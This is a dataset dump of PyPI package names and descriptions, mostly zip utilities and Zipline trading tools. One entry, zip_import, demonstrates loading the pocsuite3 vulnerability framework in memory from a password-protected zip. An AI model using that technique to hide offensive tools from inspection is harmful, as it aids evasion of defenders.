package (string, lengths 1 to 122)
package-description (string, lengths 0 to 1.3M)
zipget
No description available on PyPI.
zipgun
UNKNOWN
ziphmm
This is a minimal reimplementation of zipHMM in Python. It also contains Cython and weave implementations of standard hidden Markov models for comparison. Undocumented and with no install procedure; check test.py for usage. To run:

```bash
make
python test.py
```
ziphyr
Ziphyr

Ziphyr is on-the-fly zip archiving applied to a streamed file source, with optional on-the-fly encryption.

Features

Disclaimer: the zip-native cryptography is insecure.

- Streamed file turned into a streamed zip
- Can be used password-less for a non-encrypted zip stream
- Or with a password to apply on-the-fly zipcrypto to the stream
- Retro-compatibility for py35 with a writable ZipInfo port

Install

```bash
$ pip install ziphyr
```

Usage

```python
from ziphyr import Ziphyr

# init the Ziphyr object
z = Ziphyr(b'infected')
# z = Ziphyr() for crypto-less usage

# prepare it for a specific file, from path or metadata directly
z.from_filepath(filepath)

# consume the generator to get the encrypted zipped chunks
for k in z.generator(source):
    pass
```

Test

```bash
$ python -m unittest -v tests/*.py
```

Contributing

Contributions are welcome and are always greatly appreciated. Every little bit helps and credit will always be given. You can contribute in many ways: reporting a bug, submitting feedback, helping fix bugs, implementing new features, writing better documentation. Remember that before submitting a pull request, you should, where relevant, include tests and update the documentation.

Credits and references

zip-related: Python 3 zipfile; PKWARE's .ZIP File Format Specification.

Underlying works (sources of inspiration or examples for implementation): devthat/zipencrypt (MIT license); Ivan Ergunov's zipfile_generator (MIT license).

Cookiecutter: This package was kickstarted with Cookiecutter and the audreyr/cookiecutter-pypackage project template.
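A minimal end-to-end sketch of consuming the generator, assuming the API shown above (Ziphyr, from_filepath, generator) and that the argument to generator is the opened source file object, as the usage snippet suggests; the paths are placeholders:

```python
from ziphyr import Ziphyr

filepath = "report.pdf"          # placeholder source file

z = Ziphyr(b"infected")          # password-protected stream; Ziphyr() for crypto-less usage
z.from_filepath(filepath)        # prepare the archive entry from the file's path/metadata

# Stream the source and write the zipped (and zipcrypto-encrypted) chunks to disk.
with open(filepath, "rb") as source, open("report.pdf.zip", "wb") as out:
    for chunk in z.generator(source):
        out.write(chunk)
```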
zip-import
zip_import

Recommended (latest version):

```bash
pip install https://github.com/cn-kali-team/zip_import/archive/master.zip
```

Loading Python modules from memory:

```python
import io
import sys
import zipfile

from zip_import import ZipPathFinder


def _get_zip(path, password=None):
    with open(path, "rb") as f:
        zip_bytes = io.BytesIO(f.read())
    zip_instantiation = zipfile.ZipFile(zip_bytes)
    if password is not None:
        zip_instantiation.setpassword(pwd=bytes(str(password), 'utf-8'))
    return zip_instantiation


sys.meta_path.append(
    ZipPathFinder(
        zip_path='zip://pocsuite3.zip',
        zip_ins=_get_zip(path='pocsuite3.zip', password="11"),
    )
)

import pocsuite3
print(dir(pocsuite3))
```

zip_path can be an arbitrary string; zip_ins is the instance returned by zipfile.ZipFile.
zipimportx
This package aims to speed up imports from zipfiles for frozen python apps (and other scenarios where the zipfile is assumed not to change) by taking several shortcuts that aren't available to the standard zipimport module.

It exports a single useful name, "zipimporter", which is a drop-in replacement for the standard zipimporter class. To replace the builtin zipimport mechanism with zipimportx, do the following:

```python
import zipimportx
zipimportx.zipimporter.install()
```

With no additional work you may already find a small speedup when importing from a zipfile. Since zipimportx assumes that the zipfile will not change or go missing, it does fewer stat() calls and integrity checks than the standard zipimport implementation.

To further speed up the loading of a zipfile, you can pre-compute the zipimport "directory information" dictionary and store it in a separate index file. This will reduce the time spent parsing information out of the zipfile. Create an index file like this:

```python
from zipimportx import zipimporter
zipimporter("mylib.zip").write_index()
```

This will create the file "mylib.zip.idx" containing the pre-parsed zipfile directory information. Specifically, it will contain a marshalled dictionary object with the same structure as those in zipimport._zip_directory_cache.

In my tests, use of these indexes speeds up the initial loading of a zipfile by about a factor of 3 on Linux, and a factor of 5 on Windows.

To further speed up the loading of a collection of modules, you can "preload" the actual module data by including it directly in the index. This allows the data for several modules to be loaded in a single sequential read rather than requiring a separate read for each module. Preload module data like this:

```python
from zipimportx import zipimporter
zipimporter("mylib.zip").write_index(preload=["mymod*", "mypkg*"])
```

Each entry in the "preload" list is a filename pattern. Files from the zipfile that match any of these patterns will be preloaded when the zipfile is first accessed for import. You may want to remove them from the actual zipfile in order to save space.

It's also possible to convert a zipfile into inline python code and include that code directly in your frozen application. This can simulate the effect of having that zipfile on sys.path, while avoiding any file IO during the import process. To get the necessary sourcecode, do the following:

```python
from zipimportx import zipimporter
code = zipimporter("mylib.zip").get_inline_code()
```

Finally, it's worth re-iterating the big assumption made by this module: the zipfile must never change or go missing. If the data in the index does not reflect the actual contents of the zipfile, imports will break in unspecified and probably disastrous ways.

Note also that this package uses nothing but builtin modules. To bootstrap zipfile imports for a frozen application, you can inline this module's code directly into your application's startup script. Simply do something like this in your build process:

```python
import zipimportx
import inspect

SCRIPT = '''
%s
zipimporter.install()
import myapp
myapp.main()
''' % (inspect.getsource(zipimportx),)

freeze_this_script_somehow(SCRIPT)
zipimportx.zipimporter("path/to/frozen/library.zip").write_index()
```
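As a side note, since the index is described as a single marshalled dictionary, it can be inspected with the standard library's marshal module; this is a sketch under that assumption, not part of zipimportx's documented API:

```python
import marshal

# "mylib.zip.idx" is assumed to have been produced by
# zipimporter("mylib.zip").write_index() as described above.
with open("mylib.zip.idx", "rb") as f:
    directory_info = marshal.load(f)

# The keys mirror entries of zipimport._zip_directory_cache.
for name in sorted(directory_info):
    print(name)
```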
zipind
zipind

zipind - From a folder, make a split ZIP with INDependent parts.

Free software: MIT license. Documentation: https://zipind.readthedocs.io.

Features

- Compress a folder to .zip or .rar, dividing it into independent parts and grouping your files in alphanumeric order.
- Preserves the ordering of folders and files.
- Preserves the internal structure of folders.
- If any file exceeds the defined maximum size, that specific file is split in dependent mode.
- Set the file types to be ignored in compression (config/ignore_extensions.txt).
- Verifies that each file path length is less than the specified limit (default 250 characters).
- Sanitizes folder and file name characters to ensure compatibility with UTF-8 encoding, by auto-renaming.

Requirements

- To compress to Zip format, the 7-Zip app must be installed and added to the system variables.
- To compress to Rar format, the WinRAR app must be installed and added to the system variables.

Usage

Let's zip a folder, with a maximum of 100 MB per file, in zip mode, ignoring files with the 'ISO' extension.

Through Python script importation:

```python
import zipind

path_folder = r'c://my_project'
zipind.run(path_folder, mode='zip', mb_perfile=100, ignore_extensions=['iso'])
```

Through the terminal in chatbot-like style:

```bash
$ zipind
```

Zipind will start by responding:

```
Zipind - From a folder, make a splitted ZIP with INDependent parts
>> github.com/apenasrr/zipind <<
Paste the folder path to be compressed:
```

Now paste the folder path to be compressed:

```
Paste the folder path to be compressed: c://my_project
```

Answer the questions to customize the parameters and your project will be processed.

CLI Mode

Soon…

We recommend: mises.org - Educate yourself about economic and political freedom; lbry.tv - Store files and videos on blockchain ensuring free speech; A Cypherpunk's Manifesto - How encryption is essential to Free Speech and Privacy.

Credits

This package was created with Cookiecutter and the audreyr/cookiecutter-pypackage project template.

History

Tired of dealing with dependent-mode slicing of folders and not finding applications able to slice folders into independent pieces, the 2020 tyrannical lock-down time was used to create the first version of this tool.

0.1.0 (2020-04): Birth of the first beta version.
1.1.0 (2022-09-04): First release on PyPI.
zipint
Efficient compression and decompression of unsigned integer arrays using binary representation.

```bash
pip install zipint
```

This module provides functions for compressing and decompressing integer arrays efficiently using binary representation. It is designed to work with 2D numpy arrays and supports compression and decompression of unsigned integers in a way that minimizes storage space.

Usage:

```python
from zipint import zipint, unzipint
import numpy as np
import pandas as pd

df = pd.DataFrame(np.random.randint(2, 1000, (5, 5)))
print(df.to_string())

f1 = zipint(df)
print(f'{f1=}')

f2 = unzipint(f1)
print(f'{f2=}')

df2 = pd.DataFrame(f2)
print(df2.to_string())

#      0    1    2    3    4
# 0  393  489  469    4  777
# 1  436  322  491  753  143
# 2  257  275  920  303  176
# 3  654  981  337  395  211
# 4  444  337  972  251  749
# f1=array([432633621254921, 479733330199695, 282870732340400, 720134299069651,
#        488546033200877], dtype=uint64)
# f2=array([[393, 489, 469,   4, 777],
#        [436, 322, 491, 753, 143],
#        [257, 275, 920, 303, 176],
#        [654, 981, 337, 395, 211],
#        [444, 337, 972, 251, 749]], dtype=uint64)
#      0    1    2    3    4
# 0  393  489  469    4  777
# 1  436  322  491  753  143
# 2  257  275  920  303  176
# 3  654  981  337  395  211
# 4  444  337  972  251  749
```

Note: The module uses binary representation to efficiently store and retrieve unsigned integer values. The compressed data is stored as uint64 for optimization. If overflow occurs during conversion, the data is stored as an object-type array.
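For intuition only, here is a sketch of the bit-packing idea described in the note above — not zipint's actual implementation: each row of small unsigned integers is packed into one uint64 by reserving a fixed number of bits per value, which is also why an overflow fallback to an object array is needed when the values or the row width grow too large.

```python
import numpy as np


def pack_row(values, bits_per_value):
    """Pack small unsigned ints into a single uint64 (illustrative only)."""
    packed = np.uint64(0)
    for v in values:
        packed = (packed << np.uint64(bits_per_value)) | np.uint64(v)
    return packed


def unpack_row(packed, bits_per_value, count):
    """Recover the original values from the packed uint64."""
    mask = np.uint64((1 << bits_per_value) - 1)
    out = []
    for _ in range(count):
        out.append(int(packed & mask))
        packed = packed >> np.uint64(bits_per_value)
    return out[::-1]


row = [393, 489, 469, 4, 777]              # all values fit in 10 bits (< 1024)
packed = pack_row(row, bits_per_value=10)  # 5 * 10 = 50 bits, fits in a uint64
assert unpack_row(packed, 10, len(row)) == row
```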
zipit
zipit

A very thin wrapper around zipapp that lets you package a Python module and its dependencies.

Example

We'll use our demo "app" to showcase zipit. First, let's take a look at what our app contains:

```bash
$ cd demo
$ ls app
__main__.py  requirements.txt
```

Our "app" contains two files:

- __main__.py: This is the entrypoint to our app.
- requirements.txt: This is a classic requirements file as consumed by pip.

Getting things set up

First we need to install the dependencies for our app. zipit doesn't much care how dependencies are installed; we just need to keep track of where they're installed. Let's use pip:

```bash
$ mkdir deps
$ python3 -m pip install -r app/requirements.txt --target deps
```

zipit

Once the dependencies are installed, we can let zipit do its work:

```bash
$ cd ..
$ python3 -m zipit demo/app -d demo/deps
```

This will produce a .pyz file runnable with Python:

```bash
$ python3 app.pyz
Hello, World!
```
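For context, a rough sketch of the equivalent steps using only the standard library (shutil + zipapp) — this is the general recipe zipit wraps, not its actual implementation; paths refer to the demo layout above:

```python
import shutil
import zipapp
from pathlib import Path

build = Path("build")                      # staging directory for the archive contents
shutil.rmtree(build, ignore_errors=True)

# Copy the installed dependencies first, then the app itself,
# so that __main__.py ends up at the archive root.
shutil.copytree("demo/deps", build)
shutil.copytree("demo/app", build, dirs_exist_ok=True)

# Build the runnable archive: afterwards `python3 app.pyz` works as shown above.
zipapp.create_archive(build, target="app.pyz", interpreter="/usr/bin/env python3")
```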
zipjson
zipjson - a simple tool to create and read compressed JSON files

Installation

```bash
pip install git+https://github.com/vguzov/zipjson.git
```

Usage:

The following code creates a .zip archive with a data.json file inside it, containing the serialized data, then reads it back:

```python
import zipjson

any_jsonable_data = {"something": 42}

file_object = open("test.json.zip", "wb")  # Mind the additional 'b' flag
zipjson.dump(any_jsonable_data, file_object)

loaded_data = zipjson.load(open("test.json.zip", "rb"))
print(loaded_data)  # {'something': 42}
```

In-memory methods dumps and loads are supported as well.
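A small sketch of the in-memory variants mentioned above, assuming they mirror the json module's naming (dumps returning the compressed bytes, loads accepting them); check the project's README for the exact signatures:

```python
import zipjson

data = {"something": 42}

# Assumed API, by analogy with json.dumps / json.loads.
blob = zipjson.dumps(data)         # compressed, zip-wrapped JSON as bytes
assert zipjson.loads(blob) == data
```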
zipkin
python-zipkin is an API for recording and sending messages to Zipkin. Why use it? From http://twitter.github.io/zipkin/:

"Collecting traces helps developers gain deeper knowledge about how certain requests perform in a distributed system. Let's say we're having problems with user requests timing out. We can look up traced requests that timed out and display it in the web UI. We'll be able to quickly find the service responsible for adding the unexpected response time. If the service has been annotated adequately we can also find out where in that service the issue is happening."

Supported versions

Python: 2.6, 2.7 (the current Python Thrift release doesn't support Python 3)

Recording annotations

python-zipkin creates a single span per served request. It automatically adds a number of annotations (see below). You can also add your own annotations from anywhere in your code:

```python
from zipkin.api import api as zipkin_api

zipkin_api.record_event('MySQL: "SELECT * FROM auth_users"', duration=15000)  # Note duration is in microseconds, as defined by Zipkin
zipkin_api.record_key_value('Cache misses', 15)  # You can use string, int, long and bool values
```

Hacking

See CONTRIBUTING.md for guidelines. You can start hacking on python-zipkin with:

```bash
git clone https://github.com/prezi/python-zipkin.git
cd python-zipkin
git remote rename origin upstream
virtualenv virtualenv
. virtualenv/bin/activate
python setup.py test
```
zipkin-agent
dapr-trace-sdk

A Dapr trace SDK. Currently supports daprClient, flask and requests; other plugins are still to be developed.
zipkin_query
Failed to fetch description. HTTP Status Code: 404
ziplib
No description available on PyPI.
zipline
Zipline is a Pythonic algorithmic trading library. It is an event-driven system for backtesting. Zipline is currently used in production as the backtesting and live-trading engine powering Quantopian – a free, community-centered, hosted platform for building and executing trading strategies. Quantopian also offers a fully managed service for professionals that includes Zipline, Alphalens, Pyfolio, FactSet data, and more.

Join our Community! | Documentation | Want to Contribute? See our Development Guidelines

Features

- Ease of Use: Zipline tries to get out of your way so that you can focus on algorithm development. See below for a code example.
- "Batteries Included": many common statistics like moving average and linear regression can be readily accessed from within a user-written algorithm.
- PyData Integration: Input of historical data and output of performance statistics are based on Pandas DataFrames to integrate nicely into the existing PyData ecosystem.
- Statistics and Machine Learning Libraries: You can use libraries like matplotlib, scipy, statsmodels, and sklearn to support development, analysis, and visualization of state-of-the-art trading systems.

Installation

Zipline currently supports Python 2.7, 3.5, and 3.6, and may be installed via either pip or conda.

Note: Installing Zipline is slightly more involved than the average Python package. See the full Zipline Install Documentation for detailed instructions.

For a development installation (used to develop Zipline itself), create and activate a virtualenv, then run the etc/dev-install script.

Quickstart

See our getting started tutorial. The following code implements a simple dual moving average algorithm.

```python
from zipline.api import order_target, record, symbol


def initialize(context):
    context.i = 0
    context.asset = symbol('AAPL')


def handle_data(context, data):
    # Skip first 300 days to get full windows
    context.i += 1
    if context.i < 300:
        return

    # Compute averages
    # data.history() has to be called with the same params
    # from above and returns a pandas dataframe.
    short_mavg = data.history(context.asset, 'price', bar_count=100, frequency="1d").mean()
    long_mavg = data.history(context.asset, 'price', bar_count=300, frequency="1d").mean()

    # Trading logic
    if short_mavg > long_mavg:
        # order_target orders as many shares as needed to
        # achieve the desired number of shares.
        order_target(context.asset, 100)
    elif short_mavg < long_mavg:
        order_target(context.asset, 0)

    # Save values for later inspection
    record(AAPL=data.current(context.asset, 'price'),
           short_mavg=short_mavg,
           long_mavg=long_mavg)
```

You can then run this algorithm using the Zipline CLI. First, you must download some sample pricing and asset data:

```bash
$ zipline ingest
$ zipline run -f dual_moving_average.py --start 2014-1-1 --end 2018-1-1 -o dma.pickle --no-benchmark
```

This will download asset pricing data sourced from Quandl, and stream it through the algorithm over the specified time range. Then, the resulting performance DataFrame is saved in dma.pickle, which you can load and analyze from within Python (see the sketch at the end of this entry). You can find other examples in the zipline/examples directory.

Questions?

If you find a bug, feel free to open an issue and fill out the issue template.

Contributing

All contributions, bug reports, bug fixes, documentation improvements, enhancements, and ideas are welcome. Details on how to set up a development environment can be found in our development guidelines. If you are looking to start working with the Zipline codebase, navigate to the GitHub issues tab and start looking through interesting issues. Sometimes there are issues labeled as Beginner Friendly or Help Wanted. Feel free to ask questions on the mailing list or on Gitter.

Note

Please note that Zipline is not a community-led project. Zipline is maintained by the Quantopian engineering team, and we are quite small and often busy. Because of this, we want to warn you that we may not attend to your pull request, issue, or direct mention in months, or even years. We hope you understand, and we hope that this note might help reduce any frustration or wasted time.
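A minimal sketch of loading and inspecting the saved performance DataFrame referred to above; portfolio_value is a standard column of Zipline's perf output, and AAPL/short_mavg/long_mavg are the columns recorded by the example algorithm:

```python
import pandas as pd
import matplotlib.pyplot as plt

# Load the backtest results written by `zipline run ... -o dma.pickle`.
perf = pd.read_pickle('dma.pickle')
print(perf[['portfolio_value', 'AAPL', 'short_mavg', 'long_mavg']].tail())

# Plot the equity curve alongside the recorded price and moving averages.
fig, (ax1, ax2) = plt.subplots(2, 1, sharex=True)
perf['portfolio_value'].plot(ax=ax1)
ax1.set_ylabel('Portfolio value (USD)')
perf[['AAPL', 'short_mavg', 'long_mavg']].plot(ax=ax2)
ax2.set_ylabel('Price (USD)')
plt.show()
```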
zipline-ai
zipline-ai

Package for Zipline's Python API.
zipline-ai-dev
Zipline Python API

Overview

Zipline Python API for materializing configs to be run by the Zipline Engine.

Set up for publishing

Create your ~/.pypirc file with your credentials for the pypi repository:

```ini
[distutils]
index-servers =
    pypi
    pypitest
    local

[pypi]
username: nalgeon  # replace with your PyPI username

[pypitest]
repository: https://test.pypi.org/legacy/
username: nalgeon  # replace with your TestPyPI username

[local]
repository: <local artifactory repository>
```

Generate the required thrift modules, update the version and run the respective command to publish to the desired repository:

```bash
python setup.py sdist upload -r { pypi | pypitest | local }
```
zipline-bitmex
BitMEX bundle for Zipline.

[WARNING] There is a bug in this repo. It can ingest the data from the BitMEX API to the Zipline folder, but somehow I can't run an algorithm upon it. Any PRs or advice would be appreciated!

Usage

Install this package with pip: `pip install zipline-bitmex`. You may want to run this command with the --user parameter.

Register this package to Zipline by writing the following content to $HOME/.zipline/extension.py:

```python
from zipline.data.bundles import register
from zipline_bitmex import bitmex_bundle
import pandas as pd

start = pd.Timestamp('2019-01-01', tz='utc')
end = pd.Timestamp('2019-01-07', tz='utc')

register(
    'bitmex',
    bitmex_bundle(['XBTUSD']),
    calendar_name='bitmex',
    start_session=start,
    end_session=end,
    minutes_per_day=24 * 60,
)
```

Ingest the data bundle with:

```bash
zipline ingest -b bitmex
```
zipline-cli
Zipline CLI

Python 3 CLI Uploader for Zipline. Zipline CLI is currently functional and Under Active Development. Please open a Feature Request for new features and submit an Issue for any bugs you find.

Zipline Docs: https://zipline.diced.tech/

Table of Contents: Quick Start, Install, CLI Usage, Environment Variables, Python API Reference, Additional Information

Quick Start

```bash
python3 -m pip install zipline-cli
zipline --setup
```

Install

From PyPI using pip:

```bash
python3 -m pip install zipline-cli
```

From GitHub using pip:

```bash
python3 -m pip install git+https://github.com/cssnr/zipline-cli.git
```

From Source using pip:

```bash
git clone https://github.com/cssnr/zipline-cli.git
python3 -m pip install -e zipline-cli
```

From Source using setuptools:

```bash
git clone https://github.com/cssnr/zipline-cli.git
cd zipline-cli
python3 setup.py install
```

Uninstall

To completely remove from any above install methods:

```bash
python3 -m pip uninstall zipline-cli
```

CLI Usage

Setup Zipline URL and Token:

```bash
zipline --setup
```

Upload a File:

```bash
zipline test.txt
```

Upload Multiple Files:

```bash
zipline file1.txt file2.txt
```

Create Text File from Input:

```bash
cat test.txt | zipline
```

Create Text File from Clipboard:

```bash
zipline
# Paste or Type contents, followed by a newline, then Ctrl+D (Ctrl+Z on Windows)
```

Environment Variables

Environment Variables are stored in the .zipline file in your home directory. Location: ~/.zipline or $HOME/.zipline

| Variable | Description |
| --- | --- |
| ZIPLINE_URL | URL to your Zipline Instance |
| ZIPLINE_TOKEN | Authorization Token from Zipline |
| ZIPLINE_EMBED | Set this to enable Embed on your uploads |
| ZIPLINE_FORMAT | Output Format after upload. Variables: {filename}, {url} and {raw_url} |
| ZIPLINE_EXPIRE | See: https://zipline.diced.tech/docs/guides/upload-options#image-expiration |

See .zipline.example for an example .zipline file (a hypothetical example is also sketched at the end of this entry). You may override these by exporting the variables in your current environment or using the corresponding command line arguments. See -h for more info.

Python API Reference

Initialize the class with your Zipline URL. Everything else is a header passed as a kwarg. The API does not yet support environment variables. The Zipline Token/Authorization is a header kwarg and can be passed as follows:

```python
from zipline import Zipline

zipline = Zipline('ZIPLINE_URL', authorization='ZIPLINE_TOKEN')
```

Upload a File:

```python
from zipline import Zipline

zipline = Zipline('ZIPLINE_URL', authorization='ZIPLINE_TOKEN')

with open('text.txt') as f:
    url = zipline.send_file('test.txt', f)

print(url)
```

Additional Information

Still have questions, concerns, or comments? Feature Requests, Helpdesk Q&A, Discord. Zipline Guide: Hit That Fresh Nar Nar: youtube.com/watch?v=bJHYo2aGWgE
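A hypothetical ~/.zipline file illustrating the variables from the table above; all values are placeholders (not defaults), and the repository's .zipline.example remains the authoritative reference:

```
# ~/.zipline  (hypothetical example; values are placeholders)
ZIPLINE_URL=https://zipline.example.com
ZIPLINE_TOKEN=your-zipline-token
ZIPLINE_EMBED=true
ZIPLINE_FORMAT={filename} -> {url}
```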
zipline-cn-databundle
No description available on PyPI.
zipline-cn-extension
No description available on PyPI.
zipline-crypto
Backtest your Trading Strategies

Zipline is a Pythonic event-driven system for backtesting, developed and used as the backtesting and live-trading engine by crowd-sourced investment fund Quantopian. Since it closed late 2020, the domain that had hosted these docs expired. The library is used extensively in the book Machine Learning for Algorithmic Trading by Stefan Jansen, who is trying to keep the library up to date and available to his readers and the wider Python algotrading community.

Join our Community! | Documentation

Features

- Ease of Use: Zipline tries to get out of your way so that you can focus on algorithm development. See below for a code example.
- Batteries Included: many common statistics like moving average and linear regression can be readily accessed from within a user-written algorithm.
- PyData Integration: Input of historical data and output of performance statistics are based on Pandas DataFrames to integrate nicely into the existing PyData ecosystem.
- Statistics and Machine Learning Libraries: You can use libraries like matplotlib, scipy, statsmodels, and scikit-learn to support development, analysis, and visualization of state-of-the-art trading systems.

Installation

Zipline supports Python >= 3.9 and is compatible with current versions of the relevant NumFOCUS libraries, including pandas and scikit-learn. If your system meets the pre-requisites described in the installation instructions, you can install Zipline using pip by running:

```bash
pip install zipline-crypto
```

See the installation section of the docs for more detailed instructions.

Quickstart

See our getting started tutorial. The following code implements a simple dual moving average algorithm.

```python
from zipline.api import order_target, record, symbol


def initialize(context):
    context.i = 0
    context.asset = symbol('AAPL')


def handle_data(context, data):
    # Skip first 300 days to get full windows
    context.i += 1
    if context.i < 300:
        return

    # Compute averages
    # data.history() has to be called with the same params
    # from above and returns a pandas dataframe.
    short_mavg = data.history(context.asset, 'price', bar_count=100, frequency="1d").mean()
    long_mavg = data.history(context.asset, 'price', bar_count=300, frequency="1d").mean()

    # Trading logic
    if short_mavg > long_mavg:
        # order_target orders as many shares as needed to
        # achieve the desired number of shares.
        order_target(context.asset, 100)
    elif short_mavg < long_mavg:
        order_target(context.asset, 0)

    # Save values for later inspection
    record(AAPL=data.current(context.asset, 'price'),
           short_mavg=short_mavg,
           long_mavg=long_mavg)
```

You can then run this algorithm using the Zipline CLI. But first, you need to download some market data with historical prices and trading volumes:

```bash
$ zipline ingest -b quandl
$ zipline run -f dual_moving_average.py --start 2014-1-1 --end 2018-1-1 -o dma.pickle --no-benchmark
```

This will download asset pricing data sourced from Quandl, and stream it through the algorithm over the specified time range. Then, the resulting performance DataFrame is saved as dma.pickle, which you can load and analyze from Python. You can find other examples in the zipline/examples directory.

Questions, suggestions, bugs?

If you find a bug or have other questions about the library, feel free to open an issue and fill out the template.
zipline-django-pyodbc-azure
zipline-django-pyodbc-azure

zipline-django-pyodbc-azure is a modern fork of django-pyodbc-azure (https://github.com/michiya/django-pyodbc-azure).
zipline-live
No description available on PyPI.
zipline-live2
No description available on PyPI.
zipline-live2-vk
No description available on PyPI.
zipline-norgatedata
Integrates financial market data provided by Norgate Data with Zipline, a Pythonic algorithmic trading library for backtesting.

Key features of this extension

- Simple bundle creation
- Survivorship bias-free bundles
- Incorporates time series data such as historical index membership and dividend yield into Zipline's Pipeline mechanism
- No modifications to the Zipline code base (except to fix problems with installation and obsolete calls that crash Zipline)

Table of Contents: Requirements; How to install Zipline using Anaconda/Miniconda; How to install Zipline Reloaded and PyFolio, and Zipline-NorgateData; Upgrades of Zipline-NorgateData; Exchange Calendar Issues that require patching (Patch to allow backtesting before 20 years ago; Additional patch to allow backtesting before 1990; Patch to allow calendars other than US calendars for backtesting; Patches for Canadian equities); Backtest Assumptions; Bundle Creation; Benchmark against a symbol; Pipelines - accessing timeseries data; Worked example backtesting S&P 500 Constituents back to 1990; Worked example backtesting E-Mini S&P 500 futures; Metadata; Norgate Data Futures Market Session symbols; Zipline Limitations/Quirks; Testing on Australian ASX data; Testing on Canadian TSX data; Books/publications that use Zipline, adapted for Norgate Data use; FAQs; Change log; Installing older versions; Support; Thanks; Recent Version History

Requirements

- Zipline 2.4 and above (based upon the Zipline Reloaded fork led by Stefan Jansen, which originates from the Quantopian-developed Zipline that has since become abandonware). We recommend the latest release of Zipline Reloaded (currently v3.0) and associated packages (such as exchange-calendars) - there are too many quirks and workarounds for issues with older versions of Zipline to continue to maintain backwards compatibility.
- Python 3.8+ (Python 3.10 recommended)
- Microsoft Windows
- An active Norgate Data subscription
- Norgate Data Updater software installed and running
- Writable local user folder named .norgatedata (or defined in environment variable NORGATEDATA_ROOT) - defaults to C:\Users\Your username\.norgatedata
- Python packages: Pandas, Numpy, Logbook

Note: The "Norgate Data Updater" application (NDU) is a Windows-only application. NDU must be running for this Python package to work.

How to install Zipline using Anaconda/Miniconda

Most people have problems installing Zipline because they attempt to install it into their base environment. The solution is simple: create a separate virtual environment that only has the necessary Python packages you require. If you want to experiment, just create a new environment.

Firstly, install either Anaconda (graphical environment) or Miniconda (cut-down, command-line-based).
These instructions relate to Windows only.

How to install Zipline Reloaded and PyFolio, and Zipline-NorgateData

Here's how we installed it here at Norgate. Note: We use Mamba instead of conda for the majority of the install, as it seems to be much quicker at resolving everything (i.e. seconds instead of minutes) and parallelizes the downloads/install.

Install the latest 64-bit MiniConda or Anaconda Distribution. If you have ANY other running instances of Anaconda prompt/jupyter etc., ensure they are all shut down. Start an Anaconda (base) prompt, create an environment and install the appropriate versions of packages:

```
conda create -y -n zip310 python=3.10
conda activate zip310
conda install -y -c conda-forge h5py zipline-reloaded pyfolio-reloaded
conda install -y -c conda-forge jupyter logbook
pip install norgatedata zipline-norgatedata
if not exist %HOMEPATH%\.zipline mkdir %HOMEPATH%\.zipline
if not exist %HOMEPATH%\.zipline\extension.py copy /b NUL %HOMEPATH%\.zipline\extension.py
```

Note: Mamba is used to install zipline-reloaded, because the Conda package manager becomes confused with so many dependencies required. Mamba is also about 10 times quicker than Conda.

Upgrades of Zipline-NorgateData

To receive upgrades/updates:

```
pip install zipline-norgatedata --upgrade
```

Exchange Calendar Issues that require patching

Norgate Data has developed the following patches. Please make sure you implement the ones applicable to you.

Patch to allow backtesting before 20 years ago

Unfortunately this is hardcoded into exchange_calendars for some reason. To extend backtesting beyond more than 20 years from today:

Navigate to the exchange_calendars folder within site packages. This is typically located at C:\Users\<your username>\miniconda3\envs\zip310\Lib\site-packages\exchange_calendars. Edit exchange_calendar.py, go to line 58 and change:

```python
GLOBAL_DEFAULT_START = pd.Timestamp.now().floor("D") - pd.DateOffset(years=20)
```

to the following:

```python
GLOBAL_DEFAULT_START = pd.Timestamp('1970-01-01')
```

Additional patch to allow backtesting before 1990

In addition to the "20 year" patch above, if you want to do backtesting prior to 1990 you will need to patch Zipline to handle that too.

Navigate to the zipline folder within site packages. This is typically located at C:\Users\<your username>\miniconda3\envs\zip310\Lib\site-packages\zipline. Navigate to the subfolder utils, edit calendar_utils.py, go to line 31 and change:

```python
return ec_get_calendar(*args, side="right", start=pd.Timestamp("1990-01-01"))
```

to the following:

```python
return ec_get_calendar(*args, side="right", start=pd.Timestamp("1970-01-01"))
```

Patch to allow calendars other than US calendars for backtesting

If you see the message "AssertionError: All readers must share target trading_calendar." then you probably need this patch. Our testing shows that AU and CA stocks users need this.

Navigate to the zipline folder within site packages. This is typically located at C:\Users\<your username>\miniconda3\envs\zip310\Lib\site-packages\zipline. Navigate to the data subfolder and edit the file dispatch_bar_reader.py. Locate the code (around line 50):

```python
assert trading_calendar == r.trading_calendar, (
    "All readers must share target trading_calendar. "
    "Reader={0} for type={1} uses calendar={2} which does not "
    "match the desired shared calendar={3} ".format(
        r, t, r.trading_calendar, trading_calendar
    )
)
```

Change it to:

```python
assert isinstance(trading_calendar, type(r.trading_calendar)), (
    "All readers must share target trading_calendar. "
    "Reader={0} for type={1} uses calendar={2} which does not "
    "match the desired shared calendar={3} ".format(
        r, t, r.trading_calendar, trading_calendar
    )
)
```

(For further details, see https://github.com/quantopian/zipline/issues/2684 - this has been an issue for some time and the original solution doesn't address the issue since there are actually two instances of the calendar - one from run_algorithm and one from the register_bundle within extension.py.)

Patches for Canadian equities

If you are a Canadian Stocks user, you probably want to add this as a holiday: on 17 Dec 2008, TSX had a major outage and was halted not long after the open, and never reopened. In general, the financial industry has written off this day as a bust for the purposes of data analysis. (The New Year's observance shift to Monday only started in 2000.)

Navigate to the exchange_calendars folder within site packages. This is typically located at C:\Users\<your username>\miniconda3\envs\zip310\Lib\site-packages\exchange_calendars. Edit exchange_calendar_xtse.py and add the following at line 95:

```python
# Significant failures where TSX was, for practical purposes, closed for the entire day
TSXFailure20081217 = pd.Timestamp("2008-12-17")
```

In the same file, change the following at line 164:

```python
return list(chain(September11ClosingsCanada))
```

to:

```python
return list(chain(September11ClosingsCanada, [TSXFailure20081217]))
```

Backtest Assumptions

- Stocks are automatically set an auto_close_date of the last quoted date.
- Futures are automatically set an auto_close_date of the earlier of the following: 2 days prior to the last trading date (for cash-settled futures, and physically delivered futures that only allow delivery after the last trading date), or 2 trading days prior to the first notice date for futures that have a first notice date prior to the last trading date.

Bundle Creation

Navigate to your Zipline local settings folder. This is typically located at c:\users\<your username>\.zipline. Add the following lines at the top of your Zipline local settings file, i.e. extension.py (note: this is NOT the extension.py file inside Anaconda3\envs\<environment name>\lib\site-packages\zipline):

```python
from norgatedata import StockPriceAdjustmentType
from zipline_norgatedata import (
    register_norgatedata_equities_bundle,
    register_norgatedata_futures_bundle,
)
```

Then create as many bundle definitions as you desire. These bundles will use either a given symbol list, one or more watchlists from your Norgate Data Watchlist Library and (for futures markets) all contracts belonging to a given set of futures market session symbols. Here are some examples with varying parameters.
You should adapt these to your requirements.

register_norgatedata_equities_bundle has the following default parameters:

```python
